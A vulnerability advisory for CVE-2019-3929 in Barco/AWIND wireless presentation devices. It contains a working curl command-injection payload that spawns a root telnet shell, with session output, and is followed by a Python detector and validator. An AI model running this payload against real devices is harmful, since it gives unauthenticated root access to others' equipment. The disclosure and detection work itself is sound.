Vendor: OEM Presentation Platform
By: Jacob Baines
CVSS: 9.8 (CRITICAL)
CWE: 78 (Command Injection)
Product Name: OEM Presentation Platform
Affected Version From: 1.6.0.2
Affected Version To: 2.4.1.19
Patch Exists: YES
CVE: CVE-2019-3929
CPE: h:barco:awind_oem_presentation_platform
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Crestron AM-100, Crestron AM-101, Barco wePresent WiPG-1000P, Barco wePresent WiPG-1600W, Extron ShareLink 200/250, Teq AV IT WIPS710, InFocus LiteShow3, InFocus LiteShow4, Optoma WPS-Pro, Blackbox HD WPS, SHARP PN-L703WA
Year: 2019

Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection

A vulnerability in the Barco/AWIND OEM Presentation Platform allows an unauthenticated attacker to execute arbitrary commands on the target device. The flaw is caused by improper validation of user-supplied data passed to the file_transfer.cgi script. An attacker can exploit it by sending a specially crafted HTTP POST request to the vulnerable device; the session output below shows the injected commands running as root.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update their devices to the latest version.

Exploit-DB raw data:

##
# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection
# Date: 05/01/2019
# Exploit Author: Jacob Baines
# Tested on: Crestron AM-100 1.6.0.2
# CVE : CVE-2019-3929
# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
# Advisory: https://www.tenable.com/security/research/tra-2019-20
# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
# Affected Vendors/Device/Firmware:
#  - Crestron AM-100 1.6.0.2
#  - Crestron AM-101 2.7.0.1
#  - Barco wePresent WiPG-1000P 2.3.0.10
#  - Barco wePresent WiPG-1600W before 2.4.1.19
#  - Extron ShareLink 200/250 2.0.3.4
#  - Teq AV IT WIPS710 1.1.0.7
#  - InFocus LiteShow3 1.0.16
#  - InFocus LiteShow4 2.0.0.7
#  - Optoma WPS-Pro 1.0.0.5
#  - Blackbox HD WPS 1.0.0.5
#  - SHARP PN-L703WA 1.4.2.3
##

The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:

curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi

Example:

albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
root
albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
Trying 192.168.88.250...
Connected to 192.168.88.250.
Escape character is '^]'.

~/boa/cgi-bin #
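The request pattern above is straightforward to recognise at a reverse proxy or WAF, and it also shows what the CGI should have rejected. The following Python is an added example, not part of the advisory or any vendor code: it classifies captured POSTs to file_transfer.cgi by looking for shell metacharacters in the dir parameter, and includes the strict allowlist check a fixed CGI would apply before using the value. The request tuples, sample bodies and helper names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Characters that let a value break out of a shell-quoted argument and chain
# commands; the single quote is what the published payload relies on.
SHELL_META = re.compile(r"[;&|`$'\"\n\r()<>]")

# Allowlist for a directory name: path-safe characters only.
SAFE_DIR = re.compile(r"^[A-Za-z0-9._/-]+$")

TARGET = "/cgi-bin/file_transfer.cgi"


def dir_is_safe(value: str) -> bool:
    """Accept only allowlisted characters and no '..' path segments."""
    return bool(SAFE_DIR.match(value)) and ".." not in value.split("/")


def inspect_request(method: str, path: str, body: str) -> dict:
    """Classify one captured HTTP request (method, path, form body).

    Only POSTs to file_transfer.cgi are examined, as in the advisory.
    Returns {'suspicious': bool, 'reason': str}.
    """
    verdict = {"suspicious": False, "reason": ""}
    if method.upper() != "POST" or urlsplit(path).path != TARGET:
        return verdict
    for value in parse_qs(body, keep_blank_values=True).get("dir", []):
        if SHELL_META.search(value) or not dir_is_safe(value):
            verdict.update(suspicious=True, reason=f"unsafe 'dir' value: {value!r}")
            break
    return verdict


# Constructed samples: the advisory's payload, a benign upload, and a GET.
SAMPLE_REQUESTS = [
    ("POST", TARGET,
     "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami"),
    ("POST", TARGET, "file_transfer=new&dir=Pa_Note/slides"),
    ("GET", TARGET + "?dir=Pa_Note", ""),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return indices of requests that carry an unsafe 'dir' value."""
    return [i for i, (m, p, b) in enumerate(requests)
            if inspect_request(m, p, b)["suspicious"]]


if __name__ == "__main__":
    for i in scan():
        print("ALERT:", inspect_request(*SAMPLE_REQUESTS[i])["reason"])
```

Only the first sample trips the check; the benign upload passes both the metacharacter scan and the allowlist, and the GET is ignored because the vulnerable path is only reached via POST.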